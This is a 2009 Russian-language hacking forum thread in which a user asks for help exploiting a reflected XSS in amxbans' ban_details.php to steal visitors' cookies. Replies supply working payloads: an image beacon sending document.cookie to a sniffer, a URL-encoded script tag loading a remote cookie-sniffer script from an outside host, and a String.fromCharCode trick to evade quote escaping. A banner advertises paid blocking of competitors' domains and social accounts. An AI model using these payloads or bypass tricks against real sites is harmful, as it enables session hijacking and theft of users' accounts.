нужна помощь (пассивная xss?)

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
нужна помощь (пассивная xss?)

Опции темы

Поиск в этой теме

Опции просмотра

нужна помощь (пассивная xss?)

26.08.2009, 03:12

n3r0bi0m4n

Новичок

Регистрация: 21.08.2005

Сообщений: 25

С нами: 10904820

Репутация: 3

нужна помощь (пассивная xss?)

http://forum.antichat.ru/thread121710.html

давным давно ничем подобным не занимался - вспоминаю..

Вопрос, собственно: amxbans -> ban_details.php?ban_info[ban_reason]=/javascript_code/ работает частично. alert(document.cookie) проходит.

Пытаюсь подставить <script>img = new Image(); img.src = "website/sniffimage.gif?"+document.cookie;</script> - оно "фильтрует" кавычки. Точнее, экранирует их в \"website/sniffimage.gif\".

Залил простой скрипт (x.js: "<script>alert(hi);</script>") на сервер, пытался достучаться до него посредством <script src=blabla></script> дабы обойтись без кавычек. Не работает.

Подскажите, пжалста, выходы из положения, или хотяб намекните. Благодарю заранее.

𝕏 Twitter Reddit Telegram Копировать ссылку

26.08.2009, 03:16

seofilms

Участник форума

Регистрация: 27.05.2009

Сообщений: 115

С нами: 8925319

Репутация: 97

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%68%69%2 9%3B%3C%2F%73%63%72%69%70%74%3E
может так получится, точно незнаю )))

26.08.2009, 03:17

n3r0bi0m4n

Новичок

Регистрация: 21.08.2005

Сообщений: 25

С нами: 10904820

Репутация: 3

Спасибо, url-encode пробовал оба варианта. Не работает..

26.08.2009, 03:18

seofilms

Участник форума

Регистрация: 27.05.2009

Сообщений: 115

С нами: 8925319

Репутация: 97

вот еще как можно, на примере моего снифера
%3E%3CSCRIPT%20type=text/javascript%20src=http://httpz.ru/csmxo0306igo.js%3E%3C/SCRIPT%3E

26.08.2009, 03:23

n3r0bi0m4n

Новичок

Регистрация: 21.08.2005

Сообщений: 25

С нами: 10904820

Репутация: 3

Тем-же снффом пользуюсь )..
Оно мне не в лог пишет, а в адресной строке оставляет все куки:

http://httpz.ru/nqk7ksje7ro.gif?PHPSESSID=cefd4708a36ea......

26.08.2009, 03:27

seofilms

Участник форума

Регистрация: 27.05.2009

Сообщений: 115

С нами: 8925319

Репутация: 97

так и в логе и там оставляет, можно мне адрес странички с xss в личку, может помогу

26.08.2009, 03:31

seofilms

Участник форума

Регистрация: 27.05.2009

Сообщений: 115

С нами: 8925319

Репутация: 97

icq 781954

26.08.2009, 03:43

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

С нами: 9594385

Репутация: 386

юзай String.fromCharCode

26.08.2009, 03:56

seofilms

Участник форума

Регистрация: 27.05.2009

Сообщений: 115

С нами: 8925319

Репутация: 97

%3E%3CSCRIPT%20type=text/javascript%20src=http://httpz.ru/csmxo0306igo.js%3E%3C/SCRIPT%3E
итак всё работает))) только что проверял))) у него что то со снифом наверно или он гонит))

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Нужна пассивная XSS на mail.ru	LeopardSS	Разное - Покупка, продажа, обмен	4	08.02.2009 19:34
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23